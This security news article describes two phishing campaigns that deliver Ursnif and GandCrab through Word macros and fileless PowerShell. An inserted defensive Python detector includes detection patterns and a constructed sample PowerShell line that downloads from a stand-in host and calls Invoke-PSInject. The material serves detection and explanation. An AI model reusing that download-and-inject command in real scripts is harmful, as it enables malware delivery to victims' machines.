Security researchers have identified two distinct malware campaigns targeting systems through phishing strategies, one distributing both the Ursnif data-stealing trojan and GandCrab ransomware, while the other focuses solely on Ursnif. These threats originate from two separate cybercriminal groups but exhibit several operational similarities. Both campaigns initiate through phishing emails containing Microsoft Word attachments embedded with malicious macros, which then leverage PowerShell to deploy fileless malware on victims’ machines.

Ursnif, known for its data-theft capabilities, captures sensitive information such as banking credentials and keystrokes. It also collects system information and can deploy additional backdoors to further compromise the targeted system. GandCrab, discovered last year, is typical ransomware: it encrypts the victim's files and demands payment in cryptocurrency, specifically DASH, which is notoriously difficult to trace.

The first campaign was brought to light by security experts from Carbon Black, who uncovered around 180 variants of Microsoft Word documents containing harmful Visual Basic for Applications (VBA) macros. Upon activation, these macros execute a PowerShell script that conducts a series of actions to introduce both Ursnif and GandCrab into the infected system.

Encoded in base64, the PowerShell script executes a secondary stage of infection, designed to download the malware payloads. This initial payload assesses the architecture of the target system and retrieves further malicious components. The actions embedded in this script provide the attackers a degree of stealth, complicating detection by conventional antivirus solutions.

Researchers indicated that this PowerShell script, a modified version of the Empire Invoke-PSInject module, decodes an encoded Portable Executable (PE) file in memory and injects it into the running PowerShell process, so the payload never has to be written to disk as an executable. The ultimate goal of this procedure is the installation of GandCrab, effectively locking victims out of their files until a ransom is paid.
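As an added defender-side example (not code from Carbon Black, Talos, or this article), the following detection logic runs over constructed process-creation events and flags the chain described above: Word spawning PowerShell with an encoded command, which it decodes to look for the architecture check, download and Invoke-PSInject stages. The event layout, command lines and hostnames are all constructed for the example.

```python
import base64
import binascii
import re

# Regexes for behaviours the article attributes to the campaign. They are applied
# to the raw command line plus any decoded -EncodedCommand payload.
INDICATORS = {
    "encoded_command": re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]+"),
    "ps_inject": re.compile(r"(?i)invoke-psinject"),
    "arch_check": re.compile(r"(?i)\[IntPtr\]::Size|Is64BitOperatingSystem|PROCESSOR_ARCHITEW6432"),
    "download": re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest"),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    match = INDICATORS["encoded_command"].search(cmdline)
    if not match:
        return None
    token = match.group(0).split()[-1]
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def score_event(parent, child, cmdline):
    """Return the indicator names that fire for one process-creation event."""
    hits = []
    if parent.lower() in OFFICE_PARENTS and child.lower() == "powershell.exe":
        hits.append("office_spawned_powershell")
    decoded = decode_encoded_command(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    hits.extend(name for name, rx in INDICATORS.items() if rx.search(text))
    return hits

def encode_ps(command):
    """Encode a command the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

# Constructed sample events (parent image, child image, command line); not real telemetry.
# STAGE_ONE mimics the architecture check, download and injection steps in the article.
STAGE_ONE = ("if([IntPtr]::Size -eq 8){$u='http://payload.invalid/64'}else{$u='http://payload.invalid/32'};"
             "$pe=(New-Object Net.WebClient).DownloadString($u);Invoke-PSInject $pe")
SAMPLE_EVENTS = [
    ("WINWORD.EXE", "powershell.exe", "powershell.exe -NoP -W Hidden -enc " + encode_ps(STAGE_ONE)),
    ("explorer.exe", "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
    ("WINWORD.EXE", "splwow64.exe", "splwow64.exe 12288"),
]

def analyze(events, min_hits=2):
    """Return (event index, hits) for every event with at least min_hits indicators."""
    results = []
    for i, (parent, child, cmdline) in enumerate(events):
        hits = score_event(parent, child, cmdline)
        if len(hits) >= min_hits:
            results.append((i, hits))
    return results
```

Requiring two or more indicators keeps an administrator's unencoded scripts (the second sample event) out of the alert queue while the Word-spawned encoded command is flagged.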

Moreover, the malware checks the system's specifications and concurrently downloads an Ursnif executable, which it runs to conduct system reconnaissance, monitor web traffic, and relay the collected data to the attackers' command-and-control server. Approximately 120 different Ursnif variants were reportedly hosted on specific domains during this campaign, demonstrating the scale of this malware operation.

In a parallel effort, Cisco Talos detected a second malware campaign that uses Microsoft Word documents containing malicious VBA macros to deliver an alternative version of Ursnif. This less complex attack compromises systems in stages, beginning with phishing emails and progressing to PowerShell commands that keep the infection fileless. The payload then captures sensitive system data, archives it, and transmits the results to its command-and-control server over HTTPS.

Notably, the tactics employed in both campaigns map closely onto the MITRE ATT&CK framework: initial access through phishing, maintaining persistence via PowerShell execution, and collection and exfiltration of system data. Researchers from Talos have published indicators of compromise, including filenames associated with these operations, which organizations can use to identify and block Ursnif infections before they spread through their networks.

As cyber threats evolve, understanding these tactics and strategies enables businesses to fortify their cybersecurity defenses, emphasizing the critical need for vigilance and proactive measures against such multifaceted attacks.
